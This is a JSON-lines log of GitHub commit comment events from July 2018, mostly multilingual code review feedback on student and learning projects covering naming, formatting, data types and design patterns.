{"id":"7905011481","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562266,"position":90,"line":90,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:45:51Z","updated_at":"2018-07-02T07:45:51Z","author_association":"COLLABORATOR","body":"Brak formatowania"}},"created_at":"2018-07-02T07:45:51Z"}
{"id":"7905012378","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Plonee"},"payload":{"comment":{"id":29562271,"position":5,"line":44,"path":"week-07/day-04/repos/OrcClub/OrcClub/Controllers/HomeController.cs","commit_id":"6de3eb81b04010ba5793f1f997928298ab911c4d","created_at":"2018-07-02T07:46:05Z","updated_at":"2018-07-02T07:46:05Z","author_association":"NONE","body":"Why is it a `HttpPost` method?"}},"created_at":"2018-07-02T07:46:05Z"}
{"id":"7905013052","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562273,"position":84,"line":84,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:46:14Z","updated_at":"2018-07-02T07:46:14Z","author_association":"COLLABORATOR","body":"Nazwa metody która jest zbyt ogólna"}},"created_at":"2018-07-02T07:46:14Z"}
{"id":"7905015865","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Plonee"},"payload":{"comment":{"id":29562279,"position":16,"line":16,"path":"week-07/day-04/repos/OrcClub/OrcClub/Views/NutritionStore.cshtml","commit_id":"6de3eb81b04010ba5793f1f997928298ab911c4d","created_at":"2018-07-02T07:46:53Z","updated_at":"2018-07-02T07:46:53Z","author_association":"NONE","body":"missing new line at the end of a file"}},"created_at":"2018-07-02T07:46:53Z"}
{"id":"7905016813","type":"CommitCommentEvent","actor":{"login":"structuralist"},"repo":{"name":"hannah-rae/hannah-rae.github.io"},"payload":{"comment":{"id":29562281,"position":null,"line":null,"path":null,"commit_id":"5579ea172cbdec9f1f3cab3abc44a90369a600cc","created_at":"2018-07-02T07:47:07Z","updated_at":"2018-07-02T07:47:07Z","author_association":"COLLABORATOR","body":"Congrats 😊"}},"created_at":"2018-07-02T07:47:07Z"}
{"id":"7905017302","type":"CommitCommentEvent","actor":{"login":"cyx2288"},"repo":{"name":"zhuangyi28/project_jx_user_app"},"payload":{"comment":{"id":29562283,"position":null,"line":null,"path":null,"commit_id":"e6b48208281392a452791c9de49f1b9c529c15e2","created_at":"2018-07-02T07:47:14Z","updated_at":"2018-07-02T07:47:14Z","author_association":"COLLABORATOR","body":"合并ajax"}},"created_at":"2018-07-02T07:47:14Z"}
{"id":"7905018442","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Plonee"},"payload":{"comment":{"id":29562285,"position":null,"line":null,"path":null,"commit_id":"6de3eb81b04010ba5793f1f997928298ab911c4d","created_at":"2018-07-02T07:47:30Z","updated_at":"2018-07-02T07:47:30Z","author_association":"NONE","body":"Funny Commit Messages! 🏭 "}},"created_at":"2018-07-02T07:47:30Z"}
{"id":"7905018881","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562287,"position":106,"line":106,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:47:36Z","updated_at":"2018-07-02T07:47:36Z","author_association":"COLLABORATOR","body":"Ten sender do zmiany, Ty to rozumiesz ja bym tego nie zrozumiał"}},"created_at":"2018-07-02T07:47:36Z"}
{"id":"7905020483","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562292,"position":107,"line":107,"path":"OrderApp/AddForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:48:00Z","updated_at":"2018-07-02T07:48:00Z","author_association":"COLLABORATOR","body":"Co to za magia z tym -1?"}},"created_at":"2018-07-02T07:48:00Z"}
{"id":"7905021497","type":"CommitCommentEvent","actor":{"login":"xlzwzn"},"repo":{"name":"xlzwzn/xiaomi"},"payload":{"comment":{"id":29562295,"position":null,"line":null,"path":null,"commit_id":"456dcba4d751483f17f9503ef28de6adda1515a4","created_at":"2018-07-02T07:48:15Z","updated_at":"2018-07-02T07:48:15Z","author_association":"OWNER","body":"啦啦啦"}},"created_at":"2018-07-02T07:48:15Z"}
{"id":"7905021789","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562297,"position":7,"line":7,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:48:19Z","updated_at":"2018-07-02T07:48:19Z","author_association":"COLLABORATOR","body":"Przestrzeń nazw do poprawy, R# Ci pomoze to zrobic"}},"created_at":"2018-07-02T07:48:19Z"}
{"id":"7905022103","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Plonee"},"payload":{"comment":{"id":29562298,"position":6,"line":11,"path":"week-07/day-04/repos/OrcClub/OrcClub/Models/Orc.cs","commit_id":"df57876935266baf81214909ac5400eb126b30e6","created_at":"2018-07-02T07:48:23Z","updated_at":"2018-07-02T07:48:23Z","author_association":"NONE","body":"Props should not be verbs."}},"created_at":"2018-07-02T07:48:23Z"}
{"id":"7905024911","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562300,"position":41,"line":41,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:49:01Z","updated_at":"2018-07-02T07:49:01Z","author_association":"COLLABORATOR","body":"Spróbuj sprawy zwiazane z tworzeniem interfejsu i operacja na danych rozdzielić. Operacje na danych łatwo schować we wzorcu repozytorium"}},"created_at":"2018-07-02T07:49:01Z"}
{"id":"7905025156","type":"CommitCommentEvent","actor":{"login":"koomg9599"},"repo":{"name":"koomg9599/Sinbaram_18Summer_Algo"},"payload":{"comment":{"id":29562302,"position":null,"line":null,"path":null,"commit_id":"81c4de5323fff243fdfa61813d20b90d47ed0922","created_at":"2018-07-02T07:49:05Z","updated_at":"2018-07-02T07:49:05Z","author_association":"OWNER","body":"Brute Force"}},"created_at":"2018-07-02T07:49:05Z"}
{"id":"7905027223","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562310,"position":58,"line":58,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:49:34Z","updated_at":"2018-07-02T07:49:34Z","author_association":"COLLABORATOR","body":"Czy ta alokacja EventHandlera jest potrzebna?"}},"created_at":"2018-07-02T07:49:34Z"}
{"id":"7905027281","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Plonee"},"payload":{"comment":{"id":29562311,"position":18,"line":35,"path":"week-07/day-04/repos/OrcClub/OrcClub/Services/OrcService.cs","commit_id":"df57876935266baf81214909ac5400eb126b30e6","created_at":"2018-07-02T07:49:35Z","updated_at":"2018-07-02T07:49:35Z","author_association":"NONE","body":"why it always returns the `food[1]`?"}},"created_at":"2018-07-02T07:49:35Z"}
{"id":"7905028339","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562313,"position":78,"line":78,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:49:52Z","updated_at":"2018-07-02T07:49:52Z","author_association":"COLLABORATOR","body":"Taki kod juz widziałem, staraj sie nie powtarzać"}},"created_at":"2018-07-02T07:49:52Z"}
{"id":"7905030757","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562318,"position":74,"line":74,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:50:25Z","updated_at":"2018-07-02T07:50:25Z","author_association":"COLLABORATOR","body":"A co to jest button? Daj lepsza nazwe"}},"created_at":"2018-07-02T07:50:25Z"}
{"id":"7905031073","type":"CommitCommentEvent","actor":{"login":"JHenneberg"},"repo":{"name":"dongli/fortran-unit-test"},"payload":{"comment":{"id":29562322,"position":null,"line":null,"path":null,"commit_id":"28142e9b805433dd5bb7ae562e469cfc8a68747e","created_at":"2018-07-02T07:50:29Z","updated_at":"2018-07-02T07:50:29Z","author_association":"CONTRIBUTOR","body":"@dongli Ok I understand. Never used PGI. I am using Intel(R) Visual Fortran Compiler 18.0.3.210 in VS2015. Works flawlessly so far, `merge` and also the optional arguments.  Good idea with the file_name and line_number."}},"created_at":"2018-07-02T07:50:29Z"}
{"id":"7905031798","type":"CommitCommentEvent","actor":{"login":"xiaosongzhi"},"repo":{"name":"anantkamath/playTo"},"payload":{"comment":{"id":29562323,"position":null,"line":null,"path":null,"commit_id":"58a4ac80e3cfa5af42849f4b6c642a34fcc7379f","created_at":"2018-07-02T07:50:39Z","updated_at":"2018-07-02T07:50:39Z","author_association":"NONE","body":"when  I  build   your  project,it   said  that   can't   find  render.h,can   you  tell  me   where  is   render.h?Thanks"}},"created_at":"2018-07-02T07:50:39Z"}
{"id":"7905036429","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29562331,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-02T07:51:41Z","updated_at":"2018-07-02T07:51:41Z","author_association":"OWNER","body":"Oh, I see.\r\nI try to fix it in the next hours. "}},"created_at":"2018-07-02T07:51:41Z"}
{"id":"7905038385","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29562334,"position":4,"line":100,"path":"agent/core/src/main/java/com/axway/ats/agent/core/configuration/EnvironmentConfigurator.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T07:52:08Z","updated_at":"2018-07-02T07:52:08Z","author_association":"OWNER","body":"This must be kept"}},"created_at":"2018-07-02T07:52:08Z"}
{"id":"7905038541","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29562335,"position":11,"line":35,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T07:52:10Z","updated_at":"2018-07-02T07:52:10Z","author_association":"COLLABORATOR","body":"次回からは 課題ごとにファイル分けましょう。実は同じ実行内に同じクラス名が存在すると意図しない動作が起こる場合があるのです。"}},"created_at":"2018-07-02T07:52:10Z"}
{"id":"7905038976","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562336,"position":118,"line":118,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:52:15Z","updated_at":"2018-07-02T07:52:15Z","author_association":"COLLABORATOR","body":"Zaintsresuj sie ToString(\"C2\")"}},"created_at":"2018-07-02T07:52:15Z"}
{"id":"7905039945","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29562339,"position":null,"line":null,"path":null,"commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T07:52:29Z","updated_at":"2018-07-02T07:52:29Z","author_association":"COLLABORATOR","body":"@tomoharutsutsumi コメントしました。"}},"created_at":"2018-07-02T07:52:29Z"}
{"id":"7905041075","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29562343,"position":22,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/recycler_view/model/Timeline.java","commit_id":"ad209443734916866f21f4c7f051c377e612679d","created_at":"2018-07-02T07:52:45Z","updated_at":"2018-07-02T07:52:45Z","author_association":"NONE","body":"WARNING: [BooleanGetMethodName] A getX() method which returns a boolean should be named isX()\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#BooleanGetMethodName"}},"created_at":"2018-07-02T07:52:45Z"}
{"id":"7905041338","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562346,"position":149,"line":149,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:52:48Z","updated_at":"2018-07-02T07:52:48Z","author_association":"COLLABORATOR","body":"Czy form ma IDisposable, jeśli tak to gdzie using na Formie? :)"}},"created_at":"2018-07-02T07:52:48Z"}
{"id":"7905043421","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562350,"position":192,"line":192,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:53:17Z","updated_at":"2018-07-02T07:53:17Z","author_association":"COLLABORATOR","body":"\"dwa\" 👍 "}},"created_at":"2018-07-02T07:53:17Z"}
{"id":"7905043516","type":"CommitCommentEvent","actor":{"login":"Eldenroot"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29562351,"position":8,"line":141,"path":"czech/global.lang.php","commit_id":"37b480340ac4d9a844b36126f3b74dc0afe2bad0","created_at":"2018-07-02T07:53:18Z","updated_at":"2018-07-02T07:53:18Z","author_association":"OWNER","body":"Dalsi chybejici"}},"created_at":"2018-07-02T07:53:18Z"}
{"id":"7905045515","type":"CommitCommentEvent","actor":{"login":"TakanoriGozu"},"repo":{"name":"miraitas/cost_manage"},"payload":{"comment":{"id":29562355,"position":null,"line":null,"path":null,"commit_id":"3666f067da1141a19fc7be1c33308c877b0eb35e","created_at":"2018-07-02T07:53:45Z","updated_at":"2018-07-02T07:53:45Z","author_association":"NONE","body":"実際にDBスペースを分離する場合は、database.phpの設定部を変更する\r\n(現時点では同じ設定内容を記述)"}},"created_at":"2018-07-02T07:53:45Z"}
{"id":"7905045517","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562356,"position":192,"line":192,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:53:45Z","updated_at":"2018-07-02T07:53:45Z","author_association":"COLLABORATOR","body":"I żeby nie było ja rozumiem, że to skrót ale zobacz sam jak to wyglada :)"}},"created_at":"2018-07-02T07:53:45Z"}
{"id":"7905046517","type":"CommitCommentEvent","actor":{"login":"tknopp"},"repo":{"name":"tknopp/NFFT.jl"},"payload":{"comment":{"id":29562357,"position":2,"line":1,"path":"REQUIRE","commit_id":"fa2839d473933508f406f8519a5ca60e163b6766","created_at":"2018-07-02T07:53:57Z","updated_at":"2018-07-02T07:53:57Z","author_association":"OWNER","body":"Thanks for you help Keno! In the end migration seemed to be rather simple."}},"created_at":"2018-07-02T07:53:57Z"}
{"id":"7905048957","type":"CommitCommentEvent","actor":{"login":"uimar"},"repo":{"name":"nicolas0512/pms-test"},"payload":{"comment":{"id":29562360,"position":null,"line":null,"path":null,"commit_id":"b930316641084860129b79d86a321bbb6896e2ca","created_at":"2018-07-02T07:54:30Z","updated_at":"2018-07-02T07:54:30Z","author_association":"COLLABORATOR","body":"TEST"}},"created_at":"2018-07-02T07:54:30Z"}
{"id":"7905051344","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29562362,"position":8,"line":141,"path":"czech/global.lang.php","commit_id":"37b480340ac4d9a844b36126f3b74dc0afe2bad0","created_at":"2018-07-02T07:55:02Z","updated_at":"2018-07-02T07:55:02Z","author_association":"COLLABORATOR","body":"Ach... tak další fixup mmnt."}},"created_at":"2018-07-02T07:55:02Z"}
{"id":"7905052570","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29562366,"position":23,"line":190,"path":"ruby_fourth.rb","commit_id":"87f507d734ecd8cc590a053c9943e61f683b4da1","created_at":"2018-07-02T07:55:20Z","updated_at":"2018-07-02T07:55:20Z","author_association":"COLLABORATOR","body":"インデント"}},"created_at":"2018-07-02T07:55:20Z"}
{"id":"7905052692","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562367,"position":234,"line":234,"path":"OrderApp/OrderForm.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:55:22Z","updated_at":"2018-07-02T07:55:22Z","author_association":"COLLABORATOR","body":"Dodaj Using"}},"created_at":"2018-07-02T07:55:22Z"}
{"id":"7905053922","type":"CommitCommentEvent","actor":{"login":"nicolas0512"},"repo":{"name":"nicolas0512/pms-test"},"payload":{"comment":{"id":29562372,"position":null,"line":null,"path":null,"commit_id":"b930316641084860129b79d86a321bbb6896e2ca","created_at":"2018-07-02T07:55:38Z","updated_at":"2018-07-02T07:55:38Z","author_association":"OWNER","body":"OK Test"}},"created_at":"2018-07-02T07:55:38Z"}
{"id":"7905055990","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562375,"position":56,"line":56,"path":"RestaurantWCF/Contract/Addition.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:56:08Z","updated_at":"2018-07-02T07:56:08Z","author_association":"COLLABORATOR","body":"Popraw nazwe zmiennej"}},"created_at":"2018-07-02T07:56:08Z"}
{"id":"7905056220","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kovacsattila256"},"payload":{"comment":{"id":29562376,"position":null,"line":null,"path":null,"commit_id":"9655630856293b76dce7319e6c5ea504b98daae4","created_at":"2018-07-02T07:56:11Z","updated_at":"2018-07-02T07:56:11Z","author_association":"NONE","body":"Try to use https://gist.github.com/stephenparish/9941e89d80e2bc58a153 this for commit messages"}},"created_at":"2018-07-02T07:56:11Z"}
{"id":"7905057272","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29562379,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-02T07:56:23Z","updated_at":"2018-07-02T07:56:23Z","author_association":"NONE","body":"Z28 u-boot should be fixed with this commit while mainline u-boot doesn't want to compile for any of rk3328 boards."}},"created_at":"2018-07-02T07:56:23Z"}
{"id":"7905057799","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kovacsattila256"},"payload":{"comment":{"id":29562381,"position":43,"line":43,"path":"week-07/day-3/gf_reloaded/greenfoxapp/Student.cs","commit_id":"9655630856293b76dce7319e6c5ea504b98daae4","created_at":"2018-07-02T07:56:30Z","updated_at":"2018-07-02T07:56:30Z","author_association":"NONE","body":"missing new line at the end of a file"}},"created_at":"2018-07-02T07:56:30Z"}
{"id":"7905060396","type":"CommitCommentEvent","actor":{"login":"anouq"},"repo":{"name":"anouq/nst-app"},"payload":{"comment":{"id":29562389,"position":null,"line":null,"path":null,"commit_id":"2e74de9fc5bd85e5a13acada0fde5c195daa1d78","created_at":"2018-07-02T07:57:07Z","updated_at":"2018-07-02T07:57:07Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/fa99ec10-e3b9-4c1d-ab1c-a4819ce2d156?env_id=ibm%3Ayp%3Aus-south \"blockchain2006\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/43fe1752-afe0-4f07-bb5f-953b349296b5?env_id=ibm%3Ayp%3Aus-south \"nst-app2006\") deployed [nst-app](https://github.com/anouq/nst-app/releases/tag/deploy-ibm-yp-us-south-philip.kooijman-ns.nl-Blockchain-20180702-075706 \"deploy-ibm-yp-us-south-philip.kooijman-ns.nl-Blockchain-20180702-075706\") to [Blockchain](https://console.bluemix.net/apps/ce8490e0-4f8b-4923-bf32-81bf0d8c2ebc?env_id=ibm:yp:us-south \"ibm:yp:us-south:philip.kooijman@ns.nl:Blockchain\"), including this commit"}},"created_at":"2018-07-02T07:57:07Z"}
{"id":"7905060485","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562390,"position":58,"line":58,"path":"RestaurantWCF/Contract/Dish.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:57:08Z","updated_at":"2018-07-02T07:57:08Z","author_association":"COLLABORATOR","body":"Czasami nie ma sensu powtarzac słów jestes w klasie Dish wiec po co dodacac Dish do groupId? Sam zobacz jak to słabo wyglada\r\n\r\nnew Dish().DishGroupId"}},"created_at":"2018-07-02T07:57:08Z"}
{"id":"7905061882","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"Eldenroot/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29562394,"position":8,"line":141,"path":"czech/global.lang.php","commit_id":"37b480340ac4d9a844b36126f3b74dc0afe2bad0","created_at":"2018-07-02T07:57:25Z","updated_at":"2018-07-02T07:57:25Z","author_association":"COLLABORATOR","body":"https://github.com/BKPepe/MyBB_CZE-translation-1.8.x/commit/214c385a8c1bf20805a918e04a60809ac12bf768 :) "}},"created_at":"2018-07-02T07:57:25Z"}
{"id":"7905062760","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29562396,"position":263,"line":141,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/ActionClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T07:57:38Z","updated_at":"2018-07-02T07:57:38Z","author_association":"OWNER","body":"Check whether each constructor initializes RemoteExecutor instance"}},"created_at":"2018-07-02T07:57:38Z"}
{"id":"7905063961","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562404,"position":45,"line":45,"path":"RestaurantWCF/Contract/Order.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:57:55Z","updated_at":"2018-07-02T07:57:55Z","author_association":"COLLABORATOR","body":"Użyj typu DateTime"}},"created_at":"2018-07-02T07:57:55Z"}
{"id":"7905065000","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kovacsattila256"},"payload":{"comment":{"id":29562406,"position":null,"line":null,"path":null,"commit_id":"9655630856293b76dce7319e6c5ea504b98daae4","created_at":"2018-07-02T07:58:08Z","updated_at":"2018-07-02T07:58:08Z","author_association":"NONE","body":"Also please commit something you were doing on friday. "}},"created_at":"2018-07-02T07:58:08Z"}
{"id":"7905065448","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562409,"position":61,"line":61,"path":"RestaurantWCF/Contract/Order.cs","commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T07:58:14Z","updated_at":"2018-07-02T07:58:14Z","author_association":"COLLABORATOR","body":"Użyj typu long, int szybko się kończy :)"}},"created_at":"2018-07-02T07:58:14Z"}
{"id":"7905068696","type":"CommitCommentEvent","actor":{"login":"laurenz"},"repo":{"name":"laurenz/oracle_fdw"},"payload":{"comment":{"id":29562414,"position":null,"line":null,"path":null,"commit_id":"4accfebb33c316d71da73d341dac796df813638c","created_at":"2018-07-02T07:58:57Z","updated_at":"2018-07-02T07:58:57Z","author_association":"OWNER","body":"I don't know about the \"soon\".\r\n\r\nI am aware that it has been some time since the last release, but @yamatattsu is currently working on outer join push-down, and I'm inclined to wait for that.\r\n\r\nI always try to keep the master branch stable, and I'd say you can safely use it in production."}},"created_at":"2018-07-02T07:58:57Z"}
{"id":"7905072728","type":"CommitCommentEvent","actor":{"login":"alanhamlett"},"repo":{"name":"bkad/CamelCaseMotion"},"payload":{"comment":{"id":29562432,"position":18,"line":157,"path":"README.md","commit_id":"e2816c75c3b73f176af3e94576793b342976f0a1","created_at":"2018-07-02T07:59:51Z","updated_at":"2018-07-02T07:59:51Z","author_association":"NONE","body":"What's the difference in these alternatives? On first glance, I don't see any feature differences."}},"created_at":"2018-07-02T07:59:51Z"}
{"id":"7905073710","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562434,"position":null,"line":null,"path":null,"commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T08:00:05Z","updated_at":"2018-07-02T08:00:05Z","author_association":"COLLABORATOR","body":"Mocno zastanów się naz wzięciem większej ilości czasu, lepiej to dopracować niż wysyłać niedopracowane. Myśle że mógłbyś to jeszcze podciągnąć i przy okazji czegoś się nauczyć.\r\n\r\nCo do samej aplikacji to widać słabą znajomość formsa. Brakuje mi łądowania w tle, co teraz wydaje sie standardem. Dodaj sobie większą ilość danych i zobacz co stanie się z aplikacją. Jak to rozwiązac?"}},"created_at":"2018-07-02T08:00:05Z"}
{"id":"7905078186","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29562449,"position":23,"line":190,"path":"ruby_fourth.rb","commit_id":"87f507d734ecd8cc590a053c9943e61f683b4da1","created_at":"2018-07-02T08:00:58Z","updated_at":"2018-07-02T08:00:58Z","author_association":"COLLABORATOR","body":"一応理解できているか確認したいので質問:\r\nここで、 `index` の値を増やさないで対応したいと言われたらうまくできますか？"}},"created_at":"2018-07-02T08:00:58Z"}
{"id":"7905079350","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/publishing-app"},"payload":{"comment":{"id":29562450,"position":6,"line":9,"path":"app/controllers/posts_controller.rb","commit_id":"bd0238bfd9d2246f4749a6d97484c9f8c5419e43","created_at":"2018-07-02T08:01:13Z","updated_at":"2018-07-02T08:01:13Z","author_association":"NONE","body":"Những đoạn query thế này em có thể dùng `scope` để tránh viết dài dòng ở controller, và scope có thể được dùng lại nữa.\r\nhttp://guides.rubyonrails.org/active_record_querying.html#scopes\r\nVí dụ đoạn: `Post.where(\"approved = ? and to_post < ?\", true, Time.current)` có thể viết thành 2 scopes:\r\n\r\n`scope :approved, -> { where(approved: true) }`\r\n`scope :suitable_time, -> { where('to_post < ?', Time.now) }`\r\n\r\nRồi sử dụng: `Post.approved.suitable_time`, ngắn hơn, dễ hiểu hơn và dùng lại được (reusable), tránh viết lặp code khi nhiều chỗ cùng muốn query cùng một (hoặc nhiều) điều kiện."}},"created_at":"2018-07-02T08:01:13Z"}
{"id":"7905081923","type":"CommitCommentEvent","actor":{"login":"krzysiek-b"},"repo":{"name":"AWalicode/Restauracja"},"payload":{"comment":{"id":29562453,"position":null,"line":null,"path":null,"commit_id":"5808ca05f5e5998c7029d102e839218eebb6c2e4","created_at":"2018-07-02T08:01:44Z","updated_at":"2018-07-02T08:01:44Z","author_association":"COLLABORATOR","body":"Co do samego wpięcia wpinasz niepotrzebne pliki visuala np. suo itp i katalogi np. obj. Robisz śmietnik z repo"}},"created_at":"2018-07-02T08:01:44Z"}
{"id":"7905082462","type":"CommitCommentEvent","actor":{"login":"xlzwzn"},"repo":{"name":"xlzwzn/xiaomi"},"payload":{"comment":{"id":29562456,"position":null,"line":null,"path":null,"commit_id":"34b8f4d1b6534af434431771e47863d3ddebc03b","created_at":"2018-07-02T08:01:51Z","updated_at":"2018-07-02T08:01:51Z","author_association":"OWNER","body":"首页"}},"created_at":"2018-07-02T08:01:51Z"}
{"id":"7905085499","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562466,"position":13,"line":13,"path":"week-07/Day-04/CharacterClub/CharacterClub/Characters/Character.cs","commit_id":"8a821ec214f97e7898a730b63a1724016289ff75","created_at":"2018-07-02T08:02:33Z","updated_at":"2018-07-02T08:02:33Z","author_association":"NONE","body":"If it is a prop it should be uppercase."}},"created_at":"2018-07-02T08:02:33Z"}
{"id":"7905090187","type":"CommitCommentEvent","actor":{"login":"SharkWu"},"repo":{"name":"SharkWu/test"},"payload":{"comment":{"id":29562484,"position":null,"line":null,"path":null,"commit_id":"c31f4d29190d282c12c24b6bfbd4490cfe115ef0","created_at":"2018-07-02T08:03:38Z","updated_at":"2018-07-02T08:03:38Z","author_association":"OWNER","body":"表示提交了一次版本修改"}},"created_at":"2018-07-02T08:03:38Z"}
